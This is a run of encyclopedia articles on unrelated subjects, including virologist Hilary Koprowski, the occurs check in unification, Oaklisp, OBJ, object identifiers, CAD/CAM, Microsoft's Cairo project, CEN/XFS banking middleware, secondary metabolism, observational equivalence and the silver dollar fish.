Hilary Koprowski (5 December 1916 – 11 April 2013) was a Polish virologist and immunologist active in the United States who demonstrated the world's first effective live polio vaccine. He authored or co-authored over 875 scientific papers and co-edited several scientific journals. Koprowski received many academic honors and national decorations, including the Belgian Order of the Lion, the French Order of Merit and Legion of Honour, Finland's Order of the Lion, and the Order of Merit of the Republic of Poland. Koprowski was the target of accusations in the press related to the "oral polio vaccine AIDS hypothesis", which posited that the AIDS pandemic originated from live polio vaccines such as Koprowski's. This allegation was refuted by evidence showing that the human immunodeficiency virus was introduced to humans before his polio-vaccine trials were conducted in Africa. The case was settled out of court with a formal apology from Rolling Stone magazine. Life Hilary Koprowski was born in Warsaw to an educated, assimilated Jewish family. His parents met in 1906 when Paweł Koprowski (1882–1957) was serving in the Imperial Russian Army, and moved to Warsaw soon after their marriage in 1912. His mother, Sonia (née Berland; 1883–1967), was a dentist from Berdichev. Hilary Koprowski attended Warsaw's Mikołaj Rej Secondary School, and from age twelve he took piano lessons at the Warsaw Conservatory. He received a medical degree from Warsaw University in 1939. He also received music degrees from the Warsaw Conservatory and, in 1940, from the Santa Cecilia Conservatory in Rome. He adopted scientific research as his life's work, but never gave up music and composed several musical works. In July 1938, while in medical school, Koprowski married Irena Grasberg. In 1939, after Germany's invasion of Poland, Koprowski and his wife, likewise a physician, fled the country, using Koprowski family business connections in Manchester, England. Hilary went to Rome, where he spent a year studying piano at the Santa Cecilia Conservatory, while Irena went to France, where she gave birth to their first child, Claude Koprowski, and worked as an attending physician at a psychiatric hospital. As the invasion of France loomed in 1940, Irena and the infant escaped from France via Spain and Portugal — where the Koprowski family reunited — to Brazil, where Koprowski worked in Rio de Janeiro for the Rockefeller Foundation. His field of research for several years was finding a live-virus vaccine against yellow fever. After World War II the Koprowskis settled in Pearl River, New York, where Hilary was hired as a researcher for Lederle Laboratories, the pharmaceutical division of American Cyanamid. Here he began his polio experiments, which ultimately led to the creation of the first oral polio vaccine. Koprowski served as director of the Wistar Institute, 1957–91, during which period Wistar achieved international recognition for its vaccine research and became a National Cancer Institute Cancer Center. Koprowski died on April 11, 2013, aged 96, in Wynnewood, near Philadelphia, Pennsylvania, of pneumonia. He and his wife are buried at West Laurel Hill Cemetery, Southlawn Section, Lot 782, Bala Cynwyd, Pennsylvania. Hilary Koprowski and his late wife had two sons. Their first child, Claude (born in Paris, 1940), who died in 2020, was a retired physician. Their second son, Christopher (born 1951), is a retired physician certified in two specialties, neurology and radiation oncology. 
He is also the former chair of the department of radiation oncology at Christiana Hospital in Delaware. Polio vaccine While at Lederle Laboratories, Koprowski created an early polio vaccine, based on an orally administered attenuated polio virus. In researching a potential polio vaccine, he had focused on live viruses that were attenuated (rendered non-virulent) rather than on killed viruses (the latter became the basis for the injected vaccine subsequently developed by Jonas Salk). Koprowski viewed the live vaccine as more powerful, since it entered the intestinal tract directly and could provide lifelong immunity, whereas the Salk vaccine required booster shots. Also, administering a vaccine by mouth is easy, whereas an injection requires medical facilities and is more expensive. Koprowski developed his polio vaccine by attenuating the virus in brain cells of a cotton rat, Sigmodon hispidus, a New World species that is susceptible to polio. He administered the vaccine to himself in January 1948 and, on 27 February 1950, to 20 children at Letchworth Village, a home for disabled persons in Rockland County, New York. Seventeen of the 20 children developed antibodies to polio virus — the other three apparently already had antibodies — and none of the children developed complications. Within 10 years, the vaccine was being used on four continents. Albert Sabin's early attenuated live-virus polio vaccine was developed from attenuated polio virus that Sabin had received from Koprowski. Rabies vaccine In addition to his work on the polio vaccine, Koprowski (along with Stanley Plotkin and Tadeusz Wiktor) did significant work on an improved vaccine against rabies. The group developed the HDCV rabies vaccine in the 1960s at the Wistar Institute. It was licensed for use in the United States in 1980. Affiliations Koprowski was president of Biotechnology Foundation Laboratories, Inc., and head of the Center for Neurovirology at Thomas Jefferson University. In 2006 he was awarded a record 50th grant from the National Institutes of Health. He authored or co-authored over 875 scientific papers and co-edited several scientific journals. He served as a consultant to the World Health Organization and the Pan American Health Organization. Honors and legacy Koprowski received many honorary degrees, academic honors, and national decorations, including the Order of the Lion from the King of Belgium, the French Order of Merit for Research and Invention, a Fulbright Scholarship, and appointment as Alexander von Humboldt Professor at the Max Planck Institute for Biochemistry in Munich. In 1989 he received the San Marino Award for Medicine and the Nicolaus Copernicus Medal of the Polish Academy of Sciences in Warsaw. Koprowski received numerous honors in Philadelphia, including the Philadelphia Cancer Research Award, the John Scott Award and, in May 1990, the most prestigious honor of his home city, the Philadelphia Award. He was a Fellow of the College of Physicians of Philadelphia, which in 1959 presented him with its Alvarenga Prize. Koprowski was a member of the National Academy of Sciences, the American Academy of Arts and Sciences, the New York Academy of Sciences, and the Polish Institute of Arts and Sciences of America. He held foreign membership in the Yugoslav Academy of Sciences and Arts, the Polish Academy of Sciences, the Russian Academy of Medical Sciences, and the Finnish Society of Sciences and Letters. 
On 3 June 1983, Koprowski received an honorary doctorate from the Faculty of Medicine at Uppsala University, Sweden. On 22 March 1995, Koprowski was made a Commander of Finland's Order of the Lion by Finland's president. On 13 March 1997 he received the Légion d'honneur from the French government. On 29 September 1998 he was presented by Poland's president with the Grand Cross of Poland's Order of Merit. On 25 February 2000 Koprowski was honored with a reception at Philadelphia's Thomas Jefferson University celebrating the 50th anniversary of the first administration of his oral polio vaccine. At the reception, he received commendations from the United States Senate, the Pennsylvania Senate, and Pennsylvania Governor Tom Ridge. On 13 September 2004, Koprowski was presented with the Pioneer in NeuroVirology Award by the International Society for NeuroVirology at the 6th International Symposium on NeuroVirology held in Sardinia. On 1 May 2007, Koprowski was awarded the Albert Sabin Gold Medal by the Sabin Vaccine Institute in Baltimore, Maryland. In 2014 Drexel University established the Hilary Koprowski Prize in Neurovirology in honor of Dr. Koprowski's contributions to the field of neurovirology. The prize is awarded annually in conjunction with the International Symposium on Molecular Medicine and Infectious Disease, which is sponsored by the Institute for Molecular Medicine and Infectious Disease (IMMID) within the Drexel University College of Medicine. During the Symposium, the prize recipient is asked to deliver an honorary lecture. AIDS accusation British journalist Edward Hooper publicized a hypothesis that Koprowski's research into a polio vaccine in the Belgian Congo in the late 1950s might have caused AIDS. The OPV AIDS hypothesis has, however, been rejected by the medical community and is contradicted by at least one article in the journal Nature, which claims the HIV-1 group M virus originated in Africa 30 years before the OPV trials were conducted. The journal Science refuted Hooper's claims, writing: "[I]t can be stated with almost complete certainty that the large polio vaccine trial... was not the origin of AIDS." Koprowski rejected the claim, based on his own analysis. In a separate court case, he won a regretful clarification, and a symbolic award of $1 in damages, in a defamation suit against Rolling Stone, which had published an article repeating similar false allegations. A concurrent defamation lawsuit that Koprowski brought against the Associated Press was settled several years later; the settlement's terms were not publicly disclosed. Koprowski's original reports from 1960 to 1961 detailing part of his vaccination campaign in the Belgian Congo are available online from the World Health Organization. 
New York Times Obituary (April 21, 2013), "Hilary Koprowski dies at 96." Accademia Nazionale di Santa Cecilia alumni American immunologists American medical researchers American people of Polish-Jewish descent American virologists Chopin University of Music alumni Commanders of the Order of the Lion of Finland Deaths from pneumonia in Pennsylvania Grand Crosses of the Order of Merit of the Republic of Poland Members of the Polish Academy of Sciences Members of the United States National Academy of Sciences Polio Polish emigrants to the United States Polish immunologists Rockefeller Foundation people University of Warsaw alumni Vaccinologists 1916 births 2013 deaths Polish recipients of the Legion of Honour
Hilary Koprowski
[ "Biology" ]
2,313
[ "Vaccination", "Vaccinologists" ]
1,063,946
https://en.wikipedia.org/wiki/Occurs%20check
In computer science, the occurs check is a part of algorithms for syntactic unification. It causes unification of a variable V and a structure S to fail if S contains V. Application in theorem proving In theorem proving, unification without the occurs check can lead to unsound inference. For example, the Prolog goal X = f(X) will succeed, binding X to a cyclic structure which has no counterpart in the Herbrand universe. As another example, without occurs-check, a resolution proof can be found for the non-theorem (∀x∃y p(x,y)) → (∃y∀x p(x,y)): the negation of that formula has the conjunctive normal form p(X, f(X)) ∧ ¬p(g(Y), Y), with f and g denoting the Skolem functions for the first and second existential quantifier, respectively. Without occurs check, the literals p(X, f(X)) and p(g(Y), Y) are unifiable, producing the refuting empty clause. Rational tree unification Prolog implementations usually omit the occurs check for reasons of efficiency, which can lead to circular data structures and looping. By not performing the occurs check, the worst case complexity of unifying a term t1 with a term t2 is reduced in many cases from O(size(t1) + size(t2)) to O(min(size(t1), size(t2))); in the particular, frequent case of variable-term unifications, runtime shrinks to O(1). Modern implementations, based on Colmerauer's Prolog II, use rational tree unification to avoid looping. However, it is difficult to keep unification time linear in the presence of cyclic terms. Examples where Colmerauer's algorithm becomes quadratic can be readily constructed, but refinement proposals exist. In an example run of the unification algorithm given in Unification (computer science)#A unification algorithm without the occurs check rule (named "check" there), applying the rule "eliminate" instead leads to a cyclic graph (i.e. an infinite term) in the last step. Sound unification ISO Prolog implementations have the built-in predicate unify_with_occurs_check/2 for sound unification but are free to use unsound or even looping algorithms when unification is invoked otherwise, provided the algorithm works correctly for all cases that are "not subject to occurs-check" (NSTO). The built-in acyclic_term/1 serves to check the finiteness of terms. Implementations offering sound unification for all unifications are Qu-Prolog and Strawberry Prolog and (optionally, via a runtime flag): XSB, SWI-Prolog, CxProlog, Tau Prolog, Trealla Prolog and Scryer Prolog. A variety of optimizations can render sound unification feasible for common cases. See also Notes References Automated theorem proving Logic programming Programming constructs Unification (computer science)
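To make the role of the occurs check concrete, here is a minimal sketch of syntactic unification in Python. The term encoding (variables as ("var", name) tuples, other tuples as compound terms) and the helper names are illustrative assumptions of this sketch, not any Prolog system's internals; the point is the single occurs test that makes a goal like X = f(X) fail instead of silently building a cyclic term.

```python
# Minimal syntactic unification with an occurs check.
# Encoding (an assumption of this sketch): a variable is ("var", name);
# any other tuple is a compound term (functor, arg1, ..., argN); the
# functor name "var" is reserved for variables.

def walk(term, subst):
    # Follow bindings until reaching an unbound variable or a non-variable.
    while isinstance(term, tuple) and term[0] == "var" and term in subst:
        term = subst[term]
    return term

def occurs(var, term, subst):
    # Does var appear anywhere inside term, under the substitution?
    term = walk(term, subst)
    if term == var:
        return True
    if isinstance(term, tuple) and term[0] != "var":
        return any(occurs(var, arg, subst) for arg in term[1:])
    return False

def unify(t1, t2, subst):
    # Return an extended substitution, or None if unification fails.
    t1, t2 = walk(t1, subst), walk(t2, subst)
    if t1 == t2:
        return subst
    if isinstance(t1, tuple) and t1[0] == "var":
        if occurs(t1, t2, subst):        # the occurs check
            return None                  # X = f(X) fails here
        return {**subst, t1: t2}
    if isinstance(t2, tuple) and t2[0] == "var":
        return unify(t2, t1, subst)
    if t1[0] == t2[0] and len(t1) == len(t2):   # same functor, same arity
        for a, b in zip(t1[1:], t2[1:]):
            subst = unify(a, b, subst)
            if subst is None:
                return None
        return subst
    return None

X = ("var", "X")
print(unify(X, ("f", X), {}))               # None: rejected by occurs check
print(unify(("f", X), ("f", ("g",)), {}))   # {('var', 'X'): ('g',)}
```

Deleting the two occurs-check lines reproduces the unsound behaviour discussed above: the binding {X: f(X)} would be accepted, creating a cyclic structure, which is precisely what rational tree unification is designed to handle deliberately rather than accidentally.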
Occurs check
[ "Mathematics" ]
543
[ "Automated theorem proving", "Unification (computer science)", "Mathematical logic", "Mathematical objects", "Computational mathematics", "Equations" ]
1,063,953
https://en.wikipedia.org/wiki/Oaklisp
Oaklisp is a message-based, portable, object-oriented Scheme developed by Kevin J. Lang and Barak A. Pearlmutter while they were computer science PhD students at Carnegie Mellon University. Oaklisp uses a superset of Scheme syntax. It is based on generic operations rather than functions, and features anonymous classes, multiple inheritance, a strong error system, setters and locators for operations, and a facility for dynamic binding. Version 1.2 includes an interface, bytecode compiler, run-time system and documentation. References External links Oaklisp homepage Scheme (programming language) implementations Object-oriented programming languages
Oaklisp
[ "Technology" ]
125
[ "Computing stubs", "Computer science", "Computer science stubs" ]
1,063,976
https://en.wikipedia.org/wiki/OBJ%20%28programming%20language%29
OBJ is a programming language family introduced by Joseph Goguen in 1976, and further worked on by José Meseguer. Overview It is a family of declarative "ultra high-level" languages. It features abstract types, generic modules, subsorts (subtypes with multiple inheritance), pattern-matching modulo equations, E-strategies (user control over laziness), module expressions (for combining modules), theories and views (for describing module interfaces) for the massively parallel RRM (rewrite rule machine). Members of the OBJ family of languages include CafeOBJ, Eqlog, FOOPS, Kumo, Maude, OBJ2, and OBJ3. OBJ2 OBJ2 is a programming language with Clear-like parametrised modules and a functional system based on equations. OBJ3 OBJ3 is a version of OBJ based on order-sorted rewriting. OBJ3 is agent-oriented and runs on Austin Kyoto Common Lisp (AKCL). See also Automated theorem proving Comparison of programming languages Formal methods References J. A. Goguen, Higher-Order Functions Considered Unnecessary for Higher-Order Programming. In Research Topics in Functional Programming (June 1990). pp. 309–351. "Principles of OBJ2", K. Futatsugi et al., 12th POPL, ACM 1985, pp. 52–66. External links The OBJ archive The OBJ family Information and OBJ3 manual, PostScript format Academic programming languages Functional languages Logic in computer science Formal specification languages Theorem proving software systems Term-rewriting programming languages
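Because OBJ programs compute by using their equations as left-to-right rewrite rules, a toy reduction engine conveys the flavour of the execution model. The sketch below is an illustrative assumption throughout: it is Python, not OBJ syntax, and it omits the order-sorted types, E-strategies, and matching modulo structural axioms (such as associativity and commutativity) that distinguish real OBJ.

```python
# Toy equational rewriting in the spirit of OBJ: equations are applied
# as left-to-right rules until a normal form is reached. Illustrative
# assumptions: variables in patterns are plain strings; ground terms
# and patterns are tuples of the form (functor, arg1, ..., argN).

def match(pattern, term, binding):
    # Try to extend `binding` so that pattern matches term; None on failure.
    if isinstance(pattern, str):                  # a pattern variable
        if pattern in binding:
            return binding if binding[pattern] == term else None
        return {**binding, pattern: term}
    if (isinstance(term, tuple) and len(term) == len(pattern)
            and term[0] == pattern[0]):           # same functor and arity
        for p, t in zip(pattern[1:], term[1:]):
            binding = match(p, t, binding)
            if binding is None:
                return None
        return binding
    return None

def substitute(template, binding):
    # Instantiate a rule's right-hand side with the matched bindings.
    if isinstance(template, str):
        return binding[template]
    return (template[0],) + tuple(substitute(a, binding) for a in template[1:])

def rewrite(term, rules):
    # Reduce arguments first, then try each rule at the root.
    if isinstance(term, tuple):
        term = (term[0],) + tuple(rewrite(a, rules) for a in term[1:])
    for lhs, rhs in rules:
        b = match(lhs, term, {})
        if b is not None:
            return rewrite(substitute(rhs, b), rules)
    return term

# Peano addition as two equations: add(0, N) = N; add(s(M), N) = s(add(M, N)).
rules = [
    (("add", ("0",), "N"), "N"),
    (("add", ("s", "M"), "N"), ("s", ("add", "M", "N"))),
]
one = ("s", ("0",))
two = ("s", one)
print(rewrite(("add", two, one), rules))   # ('s', ('s', ('s', ('0',))))
```

The design choice of reducing arguments before the root mirrors an eager evaluation strategy; OBJ's E-strategies generalise exactly this decision by letting the programmer control, per operator, which arguments are reduced and when.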
OBJ (programming language)
[ "Mathematics" ]
338
[ "Logic in computer science", "Automated theorem proving", "Mathematical logic", "Theorem proving software systems", "Mathematical software" ]
1,064,013
https://en.wikipedia.org/wiki/Object%20identifier
In computing, object identifiers or OIDs are an identifier mechanism standardized by the International Telecommunication Union (ITU) and ISO/IEC for naming any object, concept, or "thing" with a globally unambiguous persistent name.

Syntax and lexicon

An OID corresponds to a node in the "OID tree" or hierarchy, which is formally defined using the ITU's OID standard, X.660. The root of the tree contains the following three arcs:

0: ITU-T
1: ISO
2: joint-iso-itu-t

Each node in the tree is represented by a series of integers separated by periods, corresponding to the path from the root through the series of ancestor nodes, to the node. Thus, the OID denoting Intel Corporation appears as follows: 1.3.6.1.4.1.343, and corresponds to the following path through the OID tree:

1 ISO
1.3 identified-organization (ISO/IEC 6523)
1.3.6 DoD
1.3.6.1 internet
1.3.6.1.4 private
1.3.6.1.4.1 IANA enterprise numbers
1.3.6.1.4.1.343 Intel Corporation

A textual representation of the OID paths is also commonly seen; for example, iso.identified-organization.dod.internet.private.enterprise.intel

Each node in the tree is controlled by an assigning authority, which may define child nodes under the node and delegate assigning authority for the child nodes. Continuing with the example, the node numbers under root node "1" are assigned by ISO; the nodes under "1.3.6" are assigned by the US Department of Defense; the nodes under "1.3.6.1.4.1" are assigned by IANA; the nodes under "1.3.6.1.4.1.343" are assigned by Intel Corporation, and so forth.

Usage

ISO/IEC 6523 "International Code Designator" uses OIDs with the prefix "1.3". In computer security, OIDs serve to name almost every object type in X.509 certificates, such as components of Distinguished Names, CPSs, etc. Within X.500 and LDAP schemas and protocols, OIDs uniquely name each attribute type and object class, and other elements of schema. In Simple Network Management Protocol (SNMP), each node in a management information base (MIB) is identified by an OID. IANA assigns Private Enterprise Numbers (PEN) to companies and other organizations under the 1.3.6.1.4.1 node. OIDs down-tree from these are among the most commonly seen; for example, within SNMP MIBs, as LDAP attributes, and as vendor suboptions in the Dynamic Host Configuration Protocol (DHCP). In the United States, Health Level Seven (HL7), a standards-developing organization in the area of electronic health care data exchange, is the assigning authority at the 2.16.840.1.113883 (joint-iso-itu-t.country.us.organization.hl7) node. HL7 maintains its own OID registry, and as of December 1, 2020 it contained almost 20,000 nodes, most of them under the HL7 root. DICOM uses OIDs. The Centers for Disease Control and Prevention uses OIDs to manage the many complex value sets or "vocabularies" used in the Public Health Information Network (PHIN) Vocabulary Access and Distribution System (VADS). See also Digital object identifier Extended Validation Certificate International Geo Sample Number LSID Persistent Object Identifier Surrogate key Uniform Resource Name Universally Unique Identifier References External links Object Identifier Repository Global OID reference database Harald Tveit Alvestrand's Object Identifier Registry IANA Private Enterprise Numbers HL7 OID registry Obtaining an Object Identifier Identifiers Network management ASN.1
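The dotted-integer syntax and the arc-name path shown above are easy to manipulate programmatically; the following Python sketch is illustrative (the name table covers only the Intel example, and the validation is deliberately minimal).

# Parse a dotted OID and print the textual arc-name path for the example.

def parse_oid(s):
    arcs = tuple(int(part) for part in s.split("."))
    if arcs[0] not in (0, 1, 2):      # root arcs: itu-t, iso, joint-iso-itu-t
        raise ValueError("first arc must be 0, 1 or 2")
    if any(a < 0 for a in arcs):
        raise ValueError("arcs are non-negative integers")
    return arcs

# Names along the example path 1.3.6.1.4.1.343 (Intel Corporation).
NAMES = {
    (1,): "iso",
    (1, 3): "identified-organization",
    (1, 3, 6): "dod",
    (1, 3, 6, 1): "internet",
    (1, 3, 6, 1, 4): "private",
    (1, 3, 6, 1, 4, 1): "enterprise",
    (1, 3, 6, 1, 4, 1, 343): "intel",
}

oid = parse_oid("1.3.6.1.4.1.343")
print(".".join(NAMES[oid[:i + 1]] for i in range(len(oid))))
# iso.identified-organization.dod.internet.private.enterprise.intel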
Object identifier
[ "Engineering" ]
851
[ "Computer networks engineering", "Network management" ]
1,064,129
https://en.wikipedia.org/wiki/Secondary%20metabolism
Secondary metabolism (also called specialized metabolism) is a term for pathways and small molecule products of metabolism that are involved in ecological interactions, but are not absolutely required for the survival of the organism. These molecules are sometimes produced by specialized cells, such as laticifers in plants. Secondary metabolites commonly mediate antagonistic interactions, such as competition and predation, as well as mutualistic ones such as pollination and resource mutualisms. Examples of secondary metabolites include antibiotics, pigments and scents. By contrast, primary metabolites are considered to be essential to the normal growth or development of an organism. Secondary metabolites are produced by many microbes, plants, fungi and animals, usually living in crowded habitats, where chemical defense represents a better option than physical escape. It is often hard to distinguish primary from secondary metabolites, because the intermediates and pathways of primary and secondary metabolism frequently overlap. Sterols, for example, are products of secondary metabolism and, at the same time, form part of the basic structure of cells.

Important secondary metabolites

Antibiotics, such as streptomycin and penicillin
Pigments, such as delphinidin
Scents, such as ionone

See also Plant secondary metabolism Phytochemistry Ophiocordyceps unilateralis References External links Secondary metabolism in plants Evolution of plant specialized metabolic pathways
Secondary metabolism
[ "Chemistry" ]
293
[ "Secondary metabolism", "Metabolism" ]
1,064,136
https://en.wikipedia.org/wiki/Observational%20equivalence
Observational equivalence is the property of two or more underlying entities being indistinguishable on the basis of their observable implications. Thus, for example, two scientific theories are observationally equivalent if all of their empirically testable predictions are identical, in which case empirical evidence cannot be used to distinguish which is closer to being correct; indeed, it may be that they are actually two different perspectives on one underlying theory. In econometrics, two parameter values (or two structures, from among a class of statistical models) are considered observationally equivalent if they both result in the same probability distribution of observable data. This term often arises in relation to the identification problem. In macroeconomics, it occurs when there are multiple structural models, with different interpretations, that are empirically indistinguishable; in that case "the mapping between structural parameters and the objective function may not display a unique minimum." In the formal semantics of programming languages, two terms M and N are observationally equivalent if and only if, in all contexts C[...] where C[M] is a valid term, it is the case that C[N] is also a valid term with the same value. Thus it is not possible, within the system, to distinguish between the two terms. This definition can be made precise only with respect to a particular calculus, one that comes with its own specific definitions of term, context, and the value of a term. The notion is due to James H. Morris, who called it "extensional equivalence." See also Underdetermination References Statistical theory Econometric modeling Programming language semantics
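The programming-language sense of the definition can be illustrated with a small Python sketch: two implementations whose input-output behaviour no calling context can tell apart (the functions and the sample context are illustrative, not part of any formal calculus).

# Two observationally equivalent implementations: every context that calls
# them on integers observes the same results.

def double_by_add(x: int) -> int:
    return x + x          # implementation M

def double_by_mul(x: int) -> int:
    return 2 * x          # implementation N

def context(f) -> int:
    # A "context" here is a program fragment with a hole for the term.
    return sum(f(n) for n in range(10)) - f(3)

assert context(double_by_add) == context(double_by_mul)   # indistinguishable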
Observational equivalence
[ "Technology" ]
335
[ "Computing stubs", "Computer science", "Computer science stubs" ]
1,064,179
https://en.wikipedia.org/wiki/CAD/CAM
CAD/CAM refers to the integration of computer-aided design (CAD) and computer-aided manufacturing (CAM). Both of these require powerful computers. CAD software helps designers and draftsmen; CAM "reduces manpower costs" in the manufacturing process.

Overview

Both CAD and CAM are computer-intensive. Although Computervision was #1 and IBM was #2 in 1981, IBM had a major advantage: its systems could accommodate "eight to 20" users at a time, whereas most competitors only had enough power to accommodate "four to six." CAD/CAM was described by The New York Times as a "computerized design and manufacturing process" that made its debut "when Computervision pioneered it in the 1970's." Other 1980s major players in CAD/CAM included General Electric and Parametric Technology Corporation; the latter subsequently acquired Computervision, which had been acquired by Prime Computer. CAD/CAM originated in the 1960s; an IBM 360/44 was used to build, via CNC, the wings of an airplane.

Computer-aided design (CAD)

One goal of CAD is to allow quicker iterations in the design process; another is to enable a smooth transition to the CAM stage. Although manually created drawings historically facilitated "a designer's goal of displaying an idea," they did not result in a machine-readable model that could be modified and subsequently used to directly build a prototype. CAD can also be used to "ensure that all the separate parts of a product will fit together as intended." CAD, when linked with simulation, can also enable bypassing the building of a less than satisfactory test version, resulting in having "dispensed with the costly, time-consuming task of building a prototype."

Computer-aided manufacturing (CAM)

In computer-aided manufacturing (CAM), using computerized specifications, a computer directs machines such as lathes and milling machines to perform work that otherwise would be controlled by a lathe or milling machine operator. This process, called numerical control (NC or CNC), is what came to be known as 20th-century computer-aided manufacturing (CAM), and it originated in the 1960s. Early 21st-century CAM introduced the use of 3D printers. CAM, although it requires initial expenditures for equipment, covers this outlay with reduced labor cost and a speedy transition from CAD to finished product, especially when the result is both timely and "ensuring one-time machining success rate."

See also Computer-aided technologies CAD/CAM dentistry CAD/CAM in the footwear industry References Computer-aided design Computer-aided manufacturing Computer-aided engineering
CAD/CAM
[ "Engineering" ]
527
[ "Computer-aided design", "Design engineering", "Industrial engineering", "Computer-aided engineering", "Construction" ]
1,064,205
https://en.wikipedia.org/wiki/Cairo%20%28operating%20system%29
Cairo was the codename for a project at Microsoft from 1991 to 1996. Its charter was to build technologies for a next-generation operating system that would fulfill Bill Gates's vision of "information at your fingertips." Cairo never shipped, although portions of its technologies have since appeared in other products. Overview Cairo was announced at the 1991 Microsoft Professional Developers Conference by Jim Allchin. It was demonstrated publicly (including a demo system for all attendees to use) at the 1993 Cairo/Win95 PDC. Microsoft changed stance on Cairo several times, sometimes calling it a product, other times referring to it as a collection of technologies. Features Cairo used distributed computing concepts to make information available quickly and seamlessly across a worldwide network of computers. The Windows 95 user interface was based on the initial design work that was done on the Cairo user interface. DCE/RPC shipped in Windows NT 3.1. Content Indexing is now a part of Internet Information Server and Windows Desktop Search. The remaining component is the object file system. It was once planned to be implemented in the form of WinFS as part of Windows Vista but development was cancelled in June 2006, with some of its technologies merged into other Microsoft products such as Microsoft SQL Server 2008, also known under the codename "Katmai". See also History of Microsoft Windows List of Microsoft codenames References Notes Distributed operating systems Microsoft Windows Microsoft operating systems Object-oriented operating systems Uncompleted Microsoft initiatives
Cairo (operating system)
[ "Technology" ]
297
[ "Computing platforms", "Microsoft Windows" ]
1,064,223
https://en.wikipedia.org/wiki/CEN/XFS
CEN/XFS or XFS (extensions for financial services) provides a client-server architecture for financial applications on the Microsoft Windows platform, especially peripheral devices such as EFTPOS terminals and ATMs which are unique to the financial industry. It is an international standard promoted by the European Committee for Standardization (known by the acronym CEN, hence CEN/XFS). The standard is based on the WOSA Extensions for Financial Services or WOSA/XFS developed by Microsoft. With the move to a more standardized software base, financial institutions have been increasingly interested in the ability to pick and choose the application programs that drive their equipment. XFS provides a common API for accessing and manipulating various financial services devices regardless of the manufacturer.

History

Chronology:
1991 - Microsoft forms "Banking Solutions Vendor Council"
1995 - WOSA/XFS 1.11 released
1997 - WOSA/XFS 2.0 released - additional support for 24 hours-a-day unattended operation
1998 - adopted by the European Committee for Standardization as an international standard
2000 - XFS 3.0 released by CEN
2008 - XFS 3.10 released by CEN
2011 - XFS 3.20 released by CEN
2015 - XFS 3.30 released by CEN
2020 - XFS 3.40 released by CEN
2022 - XFS 3.50 released by CEN

WOSA/XFS changed name to simply XFS when the standard was adopted by the international CEN/ISSS standards body. However, it is most commonly called CEN/XFS by the industry participants.

XFS middleware

While the perceived benefit of XFS is similar to Java's "write once, run anywhere" mantra, different hardware vendors often have different interpretations of the XFS standard. The result of these differences in interpretation is that applications typically use a middleware to even out the differences between the various platforms' implementations of XFS. Notable XFS middleware platforms include:
F1 Solutions - F1 TPS (multi-vendor ATM & POS solution)
Serquo - Dwide (REST API middleware for XFS)
Nexus Software LLC - Nexus Evolution
Nautilus Hyosung - Nextware
Cyttek - Gen3XFS (multi-vendor terminal solution for ATMs)
Hitachi-Omron Terminal Solutions - ATOM
Diebold - Agilis Power
NCR - NCR XFS
KAL - KAL Kalignite
Auriga - The Banking E-volution - WWS Omnichannel Platform
Phoenix Interactive - VISTAatm (acquired by Diebold)
Wincor Nixdorf - ProBase (ProBase C as WOSA/XFS platform, ProBase J as J/XFS platform)
SBS Software - KIXXtension
Dynasty Technology Group - JSI (Jam Service Interface)
HST Systems & Technologies - HAL Interface
FreeXFS - open source XFS platform
GRG Banking - eCAT (multi-vendor ATM terminal solution)
TIS - xfs.js implementation (open source, for the node.js community)
TEB - Orion

XFS test tools

XFS test tools allow testing of XFS applications and middleware on simulated hardware. Some tools include sophisticated automatic regression testing capabilities. Providers of XFS test tools include:
Cyttek Group - XFS Middleware
Abbrevia - Simplicity
Paragon - VirtualATM
FIS - ATM TestLab, Open Test Solutions (was Clear2Pay, formerly Level Four Software and Lexcel TestSystem ATM)
Serquo - XFS ATM Simulator Atmirage
KAL - KAL Kalignite Test Utilities
Dynasty Technology Group - JSI Simulators
HST Systems & Technologies (Brazil)
Takkto Technologies (Mexico)
LUTZWOLF - JDST (test tool for J/XFS compatibility)
Afferent Software - RapidFire ATM XFS

J/XFS

J/XFS is an alternative API to CEN/XFS (which is Windows specific) and also to Xpeak (which is operating system independent, based on XML messages).
J/XFS is written in Java with the objective of providing a platform-agnostic client-server architecture for financial applications, especially peripheral devices used in the financial industry such as EFTPOS terminals and ATMs. With the move to a more standardized software base, financial institutions have been increasingly interested in the ability to pick and choose the application programs that drive their equipment. J/XFS provides a common object-oriented API between a pure Java application and a wide range of financial devices, providing a layer of separation between application and device logic that can be implemented using a native J/XFS API or by wrapping an existing implementation in JavaPOS or CEN/XFS. J/XFS was developed by the companies De La Rue, IBM, NCR, Wincor Nixdorf and Sun Microsystems and is now hosted, monitored and maintained by the European Committee for Standardization, CEN. See also Xpeak - Devices Connectivity using XML (Open Source Project). Automated teller machine Teller assist unit References External links CEN/XFS Home Page Windows communication and services Device drivers Embedded systems Application programming interfaces Microsoft application programming interfaces Banking technology
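The following Python sketch illustrates the architectural idea shared by CEN/XFS and J/XFS: applications program against one device-class interface while vendor differences are hidden in interchangeable service providers. All class and method names here are hypothetical illustrations, not the actual CEN/XFS (WFS*) or J/XFS API.

# Hypothetical device-class abstraction in the spirit of XFS middleware.
from abc import ABC, abstractmethod

class CashDispenser(ABC):
    """Common contract the application programs against."""
    @abstractmethod
    def dispense(self, amount_cents: int) -> None: ...

class VendorADispenser(CashDispenser):
    def dispense(self, amount_cents: int) -> None:
        # Vendor-specific quirks (units, status codes) stay behind the interface.
        print(f"[vendor A] dispensing {amount_cents / 100:.2f}")

class VendorBDispenser(CashDispenser):
    def dispense(self, amount_cents: int) -> None:
        print(f"[vendor B] dispense request: {amount_cents} cents")

def withdraw(device: CashDispenser, amount_cents: int) -> None:
    # Application logic is identical regardless of the hardware vendor.
    device.dispense(amount_cents)

withdraw(VendorADispenser(), 5000)
withdraw(VendorBDispenser(), 5000)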
CEN/XFS
[ "Technology", "Engineering" ]
1,041
[ "Embedded systems", "Computer science", "Computer engineering", "Computer systems" ]
1,064,325
https://en.wikipedia.org/wiki/Silver%20dollar%20%28fish%29
Silver dollar is a common name given to a number of species of fishes, mostly in the genus Metynnis, tropical fish belonging to the family Serrasalmidae which are closely related to piranha and pacu. Most commonly, the name refers to Metynnis argenteus. Native to South America, these somewhat round-shaped silver fish are popular with fish-keeping hobbyists. The silver dollar is a peaceful schooling species that spends most of its time in the mid- to upper-level of the water. Its average lifespan is less than ten years, though it can live longer in captivity. A benthic spawner and egg scatterer, the adult fish will spawn around 2,000 eggs. This breeding occurs in soft, warm water in low light. Silver dollars natively live in a tropical climate at the sides of weedy rivers. They prefer water with a pH of 5–7, a water hardness of up to 15 dGH, and an ideal temperature range of 24–28 °C (75–82 °F). Their diet is almost exclusively vegetarian, and in captivity they will often eat all the plants in a tank. They will also eat worms and small insects.

Fish compatibility

